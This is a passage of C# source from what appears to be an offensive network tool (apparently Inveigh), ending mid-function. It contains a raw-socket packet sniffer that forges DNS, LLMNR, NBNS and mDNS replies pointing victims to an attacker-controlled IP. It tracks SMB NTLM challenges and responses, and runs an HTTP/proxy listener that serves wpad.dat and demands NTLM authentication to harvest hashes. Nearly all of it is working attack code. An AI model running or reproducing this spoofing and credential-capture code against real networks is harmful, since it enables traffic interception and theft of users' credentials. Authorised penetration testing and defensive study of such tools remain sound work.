public static void SnifferSpoofer(string snifferIP, string spooferIP, string dnsTTL, string llmnrTTL, string mdnsTTL, string nbnsTTL, string[] mdnsTypes, string[] nbnsTypes, string[] pcapTCP, string[] pcapUDP)
{
byte[] spooferIPData = IPAddress.Parse(spooferIP).GetAddressBytes();
byte[] byteIn = new byte[4] {
1, 0, 0, 0
};
byte[] byteOut = new byte[4] {
1, 0, 0, 0
};
byte[] byteData = new byte[65534];
Socket snifferSocket;
try
{
snifferSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP);
snifferSocket.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, true);
snifferSocket.ReceiveBufferSize = 65534;
IPEndPoint snifferEndPoint = new IPEndPoint(IPAddress.Parse(snifferIP), 0);
snifferSocket.Bind(snifferEndPoint);
snifferSocket.IOControl(IOControlCode.ReceiveAll, byteIn, byteOut);
}
catch
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[-] Error starting packet sniffer, check if shell has elevated privilege or set -Elevated N for unprivileged mode.", DateTime.Now.ToString("s")));
}
throw;
}
int packetLength;
string outputPcap = "";
if (Program.enabledPcap)
{
byte[] pcapHeader = new byte[24] {
0xd4, 0xc3, 0xb2, 0xa1, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00
};
outputPcap = Path.Combine(Program.argFileOutputDirectory, String.Concat(Program.argFilePrefix, "-Packets.pcap"));
bool existsPcapFile = File.Exists(outputPcap);
pcapFile = new FileStream(outputPcap, FileMode.Append, FileAccess.Write);
if (!existsPcapFile)
{
pcapFile.Write(pcapHeader, 0, pcapHeader.Length);
}
}
while (!Program.exitInveigh)
{
try
{
try
{
packetLength = snifferSocket.Receive(byteData, 0, byteData.Length, SocketFlags.None);
}
catch
{
packetLength = 0;
}
if (packetLength > 0)
{
MemoryStream memoryStream = new MemoryStream(byteData, 0, packetLength);
BinaryReader binaryReader = new BinaryReader(memoryStream);
byte versionHL = binaryReader.ReadByte();
binaryReader.ReadByte();
uint totalLength = Util.DataToUInt16(binaryReader.ReadBytes(2)); //this is 0 with tcp offload
binaryReader.ReadBytes(5);
byte protocolNumber = binaryReader.ReadByte();
binaryReader.ReadBytes(2);
byte[] sourceIP = binaryReader.ReadBytes(4);
IPAddress sourceIPAddress = new IPAddress(sourceIP);
byte[] destinationIP = binaryReader.ReadBytes(4);
IPAddress destinationIPAddress = new IPAddress(destinationIP);
byte headerLength = versionHL;
headerLength <<= 4;
headerLength >>= 4;
headerLength *= 4;
switch (protocolNumber)
{
case 6:
uint tcpSourcePort = Util.DataToUInt16(binaryReader.ReadBytes(2));
uint tcpDestinationPort = Util.DataToUInt16(binaryReader.ReadBytes(2));
binaryReader.ReadBytes(8);
byte tcpHeaderLength = binaryReader.ReadByte();
tcpHeaderLength >>= 4;
tcpHeaderLength *= 4;
byte tcpFlags = binaryReader.ReadByte();
binaryReader.ReadBytes(7);
int tcpPayloadLength = packetLength - (int)headerLength - (int)tcpHeaderLength;
byte[] payloadBytes = binaryReader.ReadBytes(tcpPayloadLength);
string challenge = "";
string session = "";
string tcpSession = sourceIPAddress.ToString() + ":" + Convert.ToString(tcpSourcePort);
string tcpFlagsBinary = Convert.ToString(tcpFlags, 2);
tcpFlagsBinary = tcpFlagsBinary.PadLeft(8, '0');
if (String.Equals(tcpFlagsBinary.Substring(6, 1), "1") && String.Equals(tcpFlagsBinary.Substring(3, 1), "0") && destinationIPAddress.ToString() == snifferIP)
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] TCP({1}) SYN packet received from {2}", DateTime.Now.ToString("s"), tcpDestinationPort, tcpSession));
}
}
switch (tcpDestinationPort)
{
case 139:
if (payloadBytes.Length > 0)
{
SMBConnection(payloadBytes, snifferIP, sourceIPAddress.ToString(), destinationIPAddress.ToString(), Convert.ToString(tcpSourcePort), "139");
}
session = sourceIPAddress.ToString() + ":" + Convert.ToString(tcpSourcePort);
if (Program.smbSessionTable.ContainsKey(session))
{
NTLM.GetNTLMResponse(payloadBytes, sourceIPAddress.ToString(), Convert.ToString(tcpSourcePort), "SMB", "139");
}
break;
case 445:
if (payloadBytes.Length > 0)
{
SMBConnection(payloadBytes, snifferIP, sourceIPAddress.ToString(), destinationIPAddress.ToString(), Convert.ToString(tcpSourcePort), "445");
}
session = sourceIPAddress.ToString() + ":" + Convert.ToString(tcpSourcePort);
if (Program.smbSessionTable.ContainsKey(session))
{
NTLM.GetNTLMResponse(payloadBytes, sourceIPAddress.ToString(), Convert.ToString(tcpSourcePort), "SMB", "445");
}
break;
}
switch (tcpSourcePort)
{
case 139:
if (payloadBytes.Length > 0)
{
challenge = NTLM.GetSMBNTLMChallenge(payloadBytes);
}
session = destinationIPAddress.ToString() + ":" + Convert.ToString(tcpDestinationPort);
if (!string.IsNullOrEmpty(challenge) && destinationIP != sourceIP)
{
if (!String.Equals(destinationIP, snifferIP))
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] SMB({1}) NTLM challenge {2} sent to {3}", DateTime.Now.ToString("s"), tcpSourcePort, challenge, session));
}
}
else
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] SMB({1}) NTLM challenge {2} received from {3}", DateTime.Now.ToString("s"), tcpSourcePort, challenge, session));
}
}
Program.smbSessionTable[session] = challenge;
}
break;
case 445:
if (payloadBytes.Length > 0)
{
challenge = NTLM.GetSMBNTLMChallenge(payloadBytes);
}
session = destinationIPAddress.ToString() + ":" + Convert.ToString(tcpDestinationPort);
if (!string.IsNullOrEmpty(challenge) && destinationIP != sourceIP)
{
if (!String.Equals(destinationIP, snifferIP))
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] SMB({1}) NTLM challenge {2} sent to {3}", DateTime.Now.ToString("s"), tcpSourcePort, challenge, session));
}
}
else
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] SMB({1}) NTLM challenge {2} received from {3}", DateTime.Now.ToString("s"), tcpSourcePort, challenge, session));
}
}
Program.smbSessionTable[session] = challenge;
}
break;
}
if (Program.enabledPcap && (pcapTCP != null && pcapTCP.Length > 0 && (Array.Exists(pcapTCP, element => element == tcpSourcePort.ToString()) ||
Array.Exists(pcapTCP, element => element == tcpDestinationPort.ToString()) || Array.Exists(pcapTCP, element => element == "ALL"))))
{
PcapOutput((uint)packetLength, byteData);
}
break;
case 17:
byte[] udpSourcePort = binaryReader.ReadBytes(2);
uint endpointSourcePort = Util.DataToUInt16(udpSourcePort);
uint udpDestinationPort = Util.DataToUInt16(binaryReader.ReadBytes(2));
uint udpLength = Util.DataToUInt16(binaryReader.ReadBytes(2));
binaryReader.ReadBytes(2);
byte[] udpPayload;
try
{
udpPayload = binaryReader.ReadBytes(((int)udpLength - 2) * 4);
}
catch
{
udpPayload = new byte[2];
}
switch (udpDestinationPort)
{
case 53:
string dnsResponseMessage = "";
Array.Reverse(udpSourcePort);
byte[] ttlDNS = BitConverter.GetBytes(Int32.Parse(dnsTTL));
Array.Reverse(ttlDNS);
byte[] dnsTransactionID = new byte[2];
System.Buffer.BlockCopy(udpPayload, 0, dnsTransactionID, 0, 2);
string dnsRequestHost = Util.ParseNameQuery(12, udpPayload);
byte[] dnsRequest = new byte[dnsRequestHost.Length + 2];
System.Buffer.BlockCopy(udpPayload, 12, dnsRequest, 0, dnsRequest.Length);
int udpResponseLength = dnsRequest.Length + dnsRequest.Length + spooferIP.Length + 27;
string[] dnsRequestSplit = dnsRequestHost.Split('.');
if (dnsRequestSplit != null && dnsRequestSplit.Length > 0)
{
dnsResponseMessage = Util.CheckRequest(dnsRequestSplit[0], sourceIPAddress.ToString(), snifferIP.ToString(), "DNS");
}
if (Program.enabledDNS && String.Equals(dnsResponseMessage, "response sent"))
{
using (MemoryStream ms = new MemoryStream())
{
ms.Write((new byte[2] {
0x00, 0x35
}), 0, 2);
ms.Write(udpSourcePort, 0, 2);
ms.Write(Util.IntToByteArray2(udpResponseLength), 0, 2);
ms.Write((new byte[2] {
0x00, 0x00
}), 0, 2);
ms.Write(dnsTransactionID, 0, dnsTransactionID.Length);
ms.Write((new byte[10] {
0x80, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00
}), 0, 10);
ms.Write(dnsRequest, 0, dnsRequest.Length);
ms.Write((new byte[4] {
0x00, 0x01, 0x00, 0x01
}), 0, 4);
ms.Write(dnsRequest, 0, dnsRequest.Length);
ms.Write((new byte[4] {
0x00, 0x01, 0x00, 0x01
}), 0, 4);
ms.Write(ttlDNS, 0, 4);
ms.Write((new byte[2] {
0x00, 0x04
}), 0, 2);
ms.Write(spooferIPData, 0, spooferIPData.Length);
Socket dnsSendSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.Udp);
dnsSendSocket.SendBufferSize = 1024;
IPEndPoint dnsEndPoint = new IPEndPoint(sourceIPAddress, (int)endpointSourcePort);
dnsSendSocket.SendTo(ms.ToArray(), dnsEndPoint);
dnsSendSocket.Close();
}
}
if (String.Equals(destinationIPAddress.ToString(), snifferIP.ToString()))
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] DNS request for {1} received from {2} [{3}]", DateTime.Now.ToString("s"), dnsRequestHost, sourceIPAddress, dnsResponseMessage));
}
}
else
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] DNS request for {1} sent to {2} [{3}]", DateTime.Now.ToString("s"), dnsRequestHost, destinationIPAddress, "outgoing query"));
}
}
break;
case 137:
byte[] nbnsQuestionsAnswerRRs = new byte[4];
System.Buffer.BlockCopy(udpPayload, 4, nbnsQuestionsAnswerRRs, 0, 4);
byte[] nbnsAdditionalRRs = new byte[2];
System.Buffer.BlockCopy(udpPayload, 10, nbnsAdditionalRRs, 0, 2);
if (BitConverter.ToString(nbnsQuestionsAnswerRRs) == "00-01-00-00" && BitConverter.ToString(nbnsAdditionalRRs) != "00-01")
{
string nbnsResponseMessage = "";
udpLength += 12;
byte[] ttlNBNS = BitConverter.GetBytes(Int32.Parse(nbnsTTL));
Array.Reverse(ttlNBNS);
byte[] nbnsTransactionID = new byte[2];
System.Buffer.BlockCopy(udpPayload, 0, nbnsTransactionID, 0, 2);
byte[] nbnsRequestType = new byte[2];
System.Buffer.BlockCopy(udpPayload, 43, nbnsRequestType, 0, 2);
string nbnsQueryType = NBNS.NBNSQueryType(nbnsRequestType);
byte[] nbnsRequest = new byte[udpPayload.Length - 20];
System.Buffer.BlockCopy(udpPayload, 13, nbnsRequest, 0, nbnsRequest.Length);
string nbnsRequestHost = NBNS.BytesToNBNSQuery(nbnsRequest);
nbnsResponseMessage = Util.CheckRequest(nbnsRequestHost, sourceIPAddress.ToString(), snifferIP.ToString(), "NBNS");
if (Program.enabledNBNS && String.Equals(nbnsResponseMessage, "response sent"))
{
if (Array.Exists(nbnsTypes, element => element == nbnsQueryType))
{
using (MemoryStream ms = new MemoryStream())
{
ms.Write((new byte[2] {
0x00, 0x89
}), 0, 2);
ms.Write((new byte[2] {
0x00, 0x89
}), 0, 2);
ms.Write(Util.IntToByteArray2((int)udpLength), 0, 2);
ms.Write((new byte[2] {
0x00, 0x00
}), 0, 2);
ms.Write(nbnsTransactionID, 0, nbnsTransactionID.Length);
ms.Write((new byte[11] {
0x85, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x20
}), 0, 11);
ms.Write(nbnsRequest, 0, nbnsRequest.Length);
ms.Write(nbnsRequestType, 0, 2);
ms.Write((new byte[5] {
0x00, 0x00, 0x20, 0x00, 0x01
}), 0, 5);
ms.Write(ttlNBNS, 0, 4);
ms.Write((new byte[4] {
0x00, 0x06, 0x00, 0x00
}), 0, 4);
ms.Write(spooferIPData, 0, spooferIPData.Length);
Socket nbnsSendSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.Udp);
nbnsSendSocket.SendBufferSize = 1024;
IPEndPoint nbnsEndPoint = new IPEndPoint(sourceIPAddress, 137);
nbnsSendSocket.SendTo(ms.ToArray(), nbnsEndPoint);
nbnsSendSocket.Close();
}
}
else
{
nbnsResponseMessage = "NBNS type disabled";
}
}
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] NBNS request for {1}<{2}> received from {3} [{4}]", DateTime.Now.ToString("s"), nbnsRequestHost, nbnsQueryType, sourceIPAddress, nbnsResponseMessage));
}
}
break;
case 5353:
string mdnsResponseMessage = "";
byte[] mdnsType = new byte[2];
if (BitConverter.ToString(udpPayload).EndsWith("-00-01-80-01") && String.Equals(BitConverter.ToString(udpPayload).Substring(12, 23), "00-01-00-00-00-00-00-00"))
{
udpLength += 10;
byte[] ttlMDNS = BitConverter.GetBytes(Int32.Parse(mdnsTTL));
Array.Reverse(ttlMDNS);
byte[] mdnsTransactionID = new byte[2];
string mdnsRequestHostFull = Util.ParseNameQuery(12, udpPayload);
System.Buffer.BlockCopy(udpPayload, 0, mdnsTransactionID, 0, 2);
byte[] mdnsRequest = new byte[mdnsRequestHostFull.Length + 2];
System.Buffer.BlockCopy(udpPayload, 12, mdnsRequest, 0, mdnsRequest.Length);
string[] mdnsRequestSplit = mdnsRequestHostFull.Split('.');
if (mdnsRequestSplit != null && mdnsRequestSplit.Length > 0)
{
mdnsResponseMessage = Util.CheckRequest(mdnsRequestSplit[0], sourceIPAddress.ToString(), snifferIP.ToString(), "MDNS");
}
if (Program.enabledMDNS && String.Equals(mdnsResponseMessage, "response sent"))
{
if (Array.Exists(mdnsTypes, element => element == "QU"))
{
using (MemoryStream ms = new MemoryStream())
{
ms.Write((new byte[2] {
0x14, 0xe9
}), 0, 2);
ms.Write((new byte[2] {
0x14, 0xe9
}), 0, 2);
ms.Write(Util.IntToByteArray2((int)udpLength), 0, 2);
ms.Write((new byte[2] {
0x00, 0x00
}), 0, 2);
ms.Write(mdnsTransactionID, 0, mdnsTransactionID.Length);
ms.Write((new byte[10] {
0x84, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00
}), 0, 10);
ms.Write(mdnsRequest, 0, mdnsRequest.Length);
ms.Write((new byte[4] {
0x00, 0x01, 0x80, 0x01
}), 0, 4);
ms.Write(ttlMDNS, 0, 4);
ms.Write((new byte[2] {
0x00, 0x04
}), 0, 2);
ms.Write(spooferIPData, 0, spooferIPData.Length);
Socket mdnsSendSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.Udp);
mdnsSendSocket.SendBufferSize = 1024;
IPEndPoint mdnsEndPoint = new IPEndPoint(IPAddress.Parse("224.0.0.251"), 5353);
mdnsSendSocket.SendTo(ms.ToArray(), mdnsEndPoint);
mdnsSendSocket.Close();
}
}
else
{
mdnsResponseMessage = "mDNS type disabled";
}
}
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] mDNS(QU) request for {1} received from {2} [{3}]", DateTime.Now.ToString("s"), mdnsRequestHostFull, sourceIPAddress, mdnsResponseMessage));
}
}
else if (BitConverter.ToString(udpPayload).EndsWith("-00-01") && (String.Equals(BitConverter.ToString(udpPayload).Substring(12, 23), "00-01-00-00-00-00-00-00") ||
String.Equals(BitConverter.ToString(udpPayload).Substring(12, 23), "00-02-00-00-00-00-00-00")))
{
udpLength += 4;
byte[] ttlMDNS = BitConverter.GetBytes(Int32.Parse(mdnsTTL));
Array.Reverse(ttlMDNS);
byte[] mdnsTransactionID = new byte[2];
System.Buffer.BlockCopy(udpPayload, 0, mdnsTransactionID, 0, 2);
string mdnsRequestHostFull = Util.ParseNameQuery(12, udpPayload);
byte[] mdnsRequest = new byte[mdnsRequestHostFull.Length + 2];
System.Buffer.BlockCopy(udpPayload, 12, mdnsRequest, 0, mdnsRequest.Length);
string[] mdnsRequestSplit = mdnsRequestHostFull.Split('.');
if (mdnsRequestSplit != null && mdnsRequestSplit.Length > 0)
{
mdnsResponseMessage = Util.CheckRequest(mdnsRequestSplit[0], sourceIPAddress.ToString(), snifferIP.ToString(), "MDNS");
}
if (Program.enabledMDNS && String.Equals(mdnsResponseMessage, "response sent"))
{
if (Array.Exists(mdnsTypes, element => element == "QM"))
{
using (MemoryStream ms = new MemoryStream())
{
ms.Write((new byte[2] {
0x14, 0xe9
}), 0, 2);
ms.Write((new byte[2] {
0x14, 0xe9
}), 0, 2);
ms.Write(Util.IntToByteArray2((int)udpLength), 0, 2);
ms.Write((new byte[2] {
0x00, 0x00
}), 0, 2);
ms.Write(mdnsTransactionID, 0, mdnsTransactionID.Length);
ms.Write((new byte[10] {
0x84, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00
}), 0, 10);
ms.Write(mdnsRequest, 0, mdnsRequest.Length);
ms.Write((new byte[4] {
0x00, 0x01, 0x80, 0x01
}), 0, 4);
ms.Write(ttlMDNS, 0, 4);
ms.Write((new byte[2] {
0x00, 0x04
}), 0, 2);
ms.Write(spooferIPData, 0, spooferIPData.Length);
Socket mdnsSendSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.Udp);
mdnsSendSocket.SendBufferSize = 1024;
IPEndPoint mdnsEndPoint = new IPEndPoint(IPAddress.Parse("224.0.0.251"), 5353);
mdnsSendSocket.SendTo(ms.ToArray(), mdnsEndPoint);
mdnsSendSocket.Close();
}
}
else
{
mdnsResponseMessage = "mDNS type disabled";
}
}
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] mDNS(QM) request for {1} received from {2} [{3}]", DateTime.Now.ToString("s"), mdnsRequestHostFull, sourceIPAddress, mdnsResponseMessage));
}
}
break;
case 5355:
string llmnrResponseMessage = "";
byte[] ttlLLMNR = BitConverter.GetBytes(Int32.Parse(llmnrTTL));
Array.Reverse(ttlLLMNR);
byte[] llmnrType = new byte[2];
System.Buffer.BlockCopy(udpPayload, (udpPayload.Length - 4), llmnrType, 0, 2);
if (BitConverter.ToString(llmnrType) != "00-1C")
{
udpLength += (byte)(udpPayload.Length - 2);
Array.Reverse(udpSourcePort);
byte[] llmnrTransactionID = new byte[2];
System.Buffer.BlockCopy(udpPayload, 0, llmnrTransactionID, 0, 2);
byte[] llmnrRequest = new byte[udpPayload.Length - 18];
byte[] llmnrRequestLength = new byte[1];
System.Buffer.BlockCopy(udpPayload, 12, llmnrRequestLength, 0, 1);
System.Buffer.BlockCopy(udpPayload, 13, llmnrRequest, 0, llmnrRequest.Length);
string llmnrRequestHost = System.Text.Encoding.UTF8.GetString(llmnrRequest);
llmnrResponseMessage = Util.CheckRequest(llmnrRequestHost, sourceIPAddress.ToString(), snifferIP.ToString(), "LLMNR");
if (Program.enabledLLMNR && String.Equals(llmnrResponseMessage, "response sent"))
{
using (MemoryStream ms = new MemoryStream())
{
ms.Write((new byte[2] {
0x14, 0xeb
}), 0, 2);
ms.Write(udpSourcePort, 0, 2);
ms.Write(Util.IntToByteArray2((int)udpLength), 0, 2);
ms.Write((new byte[2] {
0x00, 0x00
}), 0, 2);
ms.Write(llmnrTransactionID, 0, llmnrTransactionID.Length);
ms.Write((new byte[10] {
0x80, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00
}), 0, 10);
ms.Write(llmnrRequestLength, 0, 1);
ms.Write(llmnrRequest, 0, llmnrRequest.Length);
ms.Write((new byte[5] {
0x00, 0x00, 0x01, 0x00, 0x01
}), 0, 5);
ms.Write(llmnrRequestLength, 0, 1);
ms.Write(llmnrRequest, 0, llmnrRequest.Length);
ms.Write((new byte[5] {
0x00, 0x00, 0x01, 0x00, 0x01
}), 0, 5);
ms.Write(ttlLLMNR, 0, 4);
ms.Write((new byte[2] {
0x00, 0x04
}), 0, 2);
ms.Write(spooferIPData, 0, spooferIPData.Length);
Socket llmnrSendSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.Udp);
llmnrSendSocket.SendBufferSize = 1024;
IPEndPoint llmnrEndPoint = new IPEndPoint(sourceIPAddress, (int)endpointSourcePort);
llmnrSendSocket.SendTo(ms.ToArray(), llmnrEndPoint);
llmnrSendSocket.Close();
}
}
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] LLMNR request for {1} received from {2} [{3}]", DateTime.Now.ToString("s"), llmnrRequestHost, sourceIPAddress, llmnrResponseMessage));
}
}
break;
}
if (Program.enabledPcap && (pcapUDP != null && pcapUDP.Length > 0 && (Array.Exists(pcapUDP, element => element == udpSourcePort.ToString()) ||
Array.Exists(pcapUDP, element => element == udpDestinationPort.ToString()) || Array.Exists(pcapUDP, element => element == "ALL"))))
{
PcapOutput((uint)packetLength, byteData);
}
break;
}
}
}
catch (Exception ex)
{
Program.outputList.Add(String.Format("[-] [{0}] Packet sniffing error detected - {1}", DateTime.Now.ToString("s"), ex.ToString()));
}
}
}
public static void HTTPListener(string httpIP, string httpPort, string ntlmChallenge, string computerName, string dnsDomain,
string netbiosDomain, string httpBasicRealm, string httpAuth, string httpResponse, string wpadAuth, string wpadResponse, string[] wpadAuthIgnore, string[] proxyIgnore, bool proxyListener)
{
TcpListener httpListener = null;
TcpClient httpClient = new TcpClient();
NetworkStream httpStream = null;
IAsyncResult httpAsync;
bool httpConnectionHeaderClose = false;
bool httpClientClose = false;
string httpRawURL = "";
string httpRawURLOld = "";
IntPtr httpClientHandleOld = new IntPtr(0);
string httpType = "HTTP";
if (!String.Equals(httpIP, "0.0.0.0"))
{
httpListener = new TcpListener(IPAddress.Parse(httpIP), Int32.Parse(httpPort));
}
else
{
httpListener = new TcpListener(System.Net.IPAddress.Any, Int32.Parse(httpPort));
}
if (proxyListener)
{
httpType = "Proxy";
httpListener.Server.LingerState = new LingerOption(true, 0);
}
try
{
httpListener.Start();
}
catch
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[-] Error starting unprivileged {1} listener, check IP and port usage.", DateTime.Now.ToString("s"), httpType));
}
throw;
}
while (!Program.exitInveigh)
{
try
{
string httpContentLength = "Content-Length: 0";
string httpMethod = "";
string httpRequest = "";
string authorizationNTLM = "NTLM";
bool httpSend = true;
bool proxyIgnoreMatch = false;
bool wpadAuthIgnoreMatch = false;
bool ntlmESS = false;
byte[] httpHeaderContentType = Encoding.UTF8.GetBytes("Content-Type: text/html");
byte[] httpHeaderAuthenticate = null;
byte[] httpHeaderAuthenticateData = null;
byte[] httpHeaderCacheControl = null;
byte[] httpHeaderStatusCode = null;
byte[] httpResponsePhrase = null;
byte[] httpMessage = null;
string httpHeaderAuthorization = "";
string httpHeaderHost = "";
string httpHeaderUserAgent = "";
byte[] httpRequestData = new byte[4096];
int httpReset = 0;
if (!httpClient.Connected)
{
httpClientClose = false;
httpAsync = httpListener.BeginAcceptTcpClient(null, null);
do
{
System.Threading.Thread.Sleep(10);
if (Program.exitInveigh)
{
break;
}
}while (!httpAsync.IsCompleted);
httpClient = httpListener.EndAcceptTcpClient(httpAsync);
httpStream = httpClient.GetStream();
}
while (httpStream.DataAvailable)
{
httpStream.Read(httpRequestData, 0, httpRequestData.Length);
}
httpRequest = System.BitConverter.ToString(httpRequestData);
if (!String.IsNullOrEmpty(httpRequest) && (httpRequest.StartsWith("47-45-54-20") || httpRequest.StartsWith("48-45-41-44-20") || httpRequest.StartsWith("4F-50-54-49-4F-4E-53-20") || httpRequest.StartsWith("43-4F-4E-4E-45-43-54-20") || httpRequest.StartsWith("50-4F-53-54-20")))
{
httpRawURL = httpRequest.Substring(httpRequest.IndexOf("-20-") + 4, httpRequest.Substring(httpRequest.IndexOf("-20-") + 1).IndexOf("-20-") - 3);
httpRawURL = Util.HexStringToString(httpRawURL);
string httpSourceIP = ((IPEndPoint)(httpClient.Client.RemoteEndPoint)).Address.ToString();
string httpSourcePort = ((IPEndPoint)(httpClient.Client.RemoteEndPoint)).Port.ToString();
httpConnectionHeaderClose = true;
if (httpRequest.StartsWith("47-45-54-20"))
{
httpMethod = "GET";
}
else if (httpRequest.StartsWith("48-45-41-44-20"))
{
httpMethod = "HEAD";
}
else if (httpRequest.StartsWith("4F-50-54-49-4F-4E-53-20"))
{
httpMethod = "OPTIONS";
}
else if (httpRequest.StartsWith("43-4F-4E-4E-45-43-54-20"))
{
httpMethod = "CONNECT";
}
else if (httpRequest.StartsWith("50-4F-53-54-20"))
{
httpMethod = "POST";
}
if (httpRequest.Contains("-48-6F-73-74-3A-20-"))
{
httpHeaderHost = httpRequest.Substring(httpRequest.IndexOf("-48-6F-73-74-3A-20-") + 19);
httpHeaderHost = httpHeaderHost.Substring(0, httpHeaderHost.IndexOf("-0D-0A-"));
httpHeaderHost = Util.HexStringToString(httpHeaderHost);
}
if (httpRequest.Contains("-55-73-65-72-2D-41-67-65-6E-74-3A-20-"))
{
httpHeaderUserAgent = httpRequest.Substring(httpRequest.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 37);
httpHeaderUserAgent = httpHeaderUserAgent.Substring(0, httpHeaderUserAgent.IndexOf("-0D-0A-"));
httpHeaderUserAgent = Util.HexStringToString(httpHeaderUserAgent);
}
if (httpClientHandleOld != httpClient.Client.Handle)
{
httpClientHandleOld = httpClient.Client.Handle;
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] {1}({2}) HTTP {3} request for {4} received from {5}:{6}", DateTime.Now.ToString("s"), httpType, httpPort, httpMethod, httpRawURL, httpSourceIP, httpSourcePort));
Program.outputList.Add(String.Format("[+] [{0}] {1}({2}) HTTP host header {3} received from {4}:{5}", DateTime.Now.ToString("s"), httpType, httpPort, httpHeaderHost, httpSourceIP, httpSourcePort));
if (!String.IsNullOrEmpty(httpHeaderUserAgent))
{
Program.outputList.Add(String.Format("[+] [{0}] {1}({2}) HTTP user agent received from {3}:{4}:{5}{6}", DateTime.Now.ToString("s"), httpType, httpPort, httpSourceIP, httpSourcePort, System.Environment.NewLine, httpHeaderUserAgent));
}
}
if (Program.enabledProxy && proxyIgnore != null && proxyIgnore.Length > 0)
{
foreach (string agent in proxyIgnore)
{
if (httpHeaderUserAgent.ToUpper().Contains(agent.ToUpper()))
{
proxyIgnoreMatch = true;
}
}
if (proxyIgnoreMatch)
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] {1}({2}) ignoring wpad.dat request for proxy due to user agent match from {3}:{4}", DateTime.Now.ToString("s"), httpType, httpPort, httpSourceIP, httpSourcePort));
}
}
}
}
if (httpRequest.Contains("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-"))
{
httpHeaderAuthorization = httpRequest.Substring(httpRequest.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46);
httpHeaderAuthorization = httpHeaderAuthorization.Substring(0, httpHeaderAuthorization.IndexOf("-0D-0A-"));
httpHeaderAuthorization = Util.HexStringToString(httpHeaderAuthorization);
}
if (wpadAuthIgnore != null && wpadAuthIgnore.Length > 0 && wpadAuth.ToUpper().StartsWith("NTLM "))
{
foreach (string agent in wpadAuthIgnore)
{
if (httpHeaderUserAgent.ToUpper().Contains(agent.ToUpper()))
{
wpadAuthIgnoreMatch = true;
}
}
if (wpadAuthIgnoreMatch)
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] {1}({2}) switching wpad.dat auth to anonymous due to user agent match from {3}:{4}", DateTime.Now.ToString("s"), httpType, httpPort, httpSourceIP, httpSourcePort));
}
}
}
if (!String.Equals(httpRawURL, "/wpad.dat") && String.Equals(httpAuth, "Anonymous") || String.Equals(httpRawURL, "/wpad.dat") && String.Equals(wpadAuth, "Anonymous") || wpadAuthIgnoreMatch)
{
httpHeaderStatusCode = new byte[] { 0x32, 0x30, 0x30 };
httpResponsePhrase = new byte[] { 0x4f, 0x4b };
httpClientClose = true;
}
else
{
if (String.Equals(httpRawURL, "/wpad.dat") && String.Equals(wpadAuth, "NTLM") || String.Equals(httpRawURL, "/wpad.dat") && String.Equals(httpAuth, "NTLM"))
{
ntlmESS = true;
}
if (proxyListener)
{
httpHeaderStatusCode = new byte[] { 0x34, 0x30, 0x37 };
httpHeaderAuthenticate = new byte[] { 0x50, 0x72, 0x6f, 0x78, 0x79, 0x2d, 0x41, 0x75, 0x74, 0x68, 0x65, 0x6e, 0x74, 0x69, 0x63, 0x61, 0x74, 0x65, 0x3a, 0x20 };
}
else
{
httpHeaderStatusCode = new byte[] { 0x34, 0x30, 0x31 };
httpHeaderAuthenticate = new byte[] { 0x57, 0x57, 0x57, 0x2d, 0x41, 0x75, 0x74, 0x68, 0x65, 0x6e, 0x74, 0x69, 0x63, 0x61, 0x74, 0x65, 0x3a, 0x20 };
}
httpResponsePhrase = new byte[] { 0x55, 0x6e, 0x61, 0x75, 0x74, 0x68, 0x6f, 0x72, 0x69, 0x7a, 0x65, 0x64 };
}
if (httpHeaderAuthorization.ToUpper().StartsWith("NTLM "))
{
httpHeaderAuthorization = httpHeaderAuthorization.Substring(5, httpHeaderAuthorization.Length - 5);
byte[] httpAuthorization = System.Convert.FromBase64String(httpHeaderAuthorization);
httpConnectionHeaderClose = false;
if ((System.BitConverter.ToString(httpAuthorization.Skip(8).Take(4).ToArray())).Equals("01-00-00-00"))
{
authorizationNTLM = GetNTLMChallengeBase64(ntlmESS, ntlmChallenge, httpSourceIP, httpSourcePort, Int32.Parse(httpPort), computerName, netbiosDomain, dnsDomain);
}
else if ((System.BitConverter.ToString(httpAuthorization.Skip(8).Take(4).ToArray())).Equals("03-00-00-00"))
{
string session = httpSourceIP + ":" + httpSourcePort;
string challengeNTLM = "";
try
{
challengeNTLM = Program.httpSessionTable[session].ToString();
}
catch
{
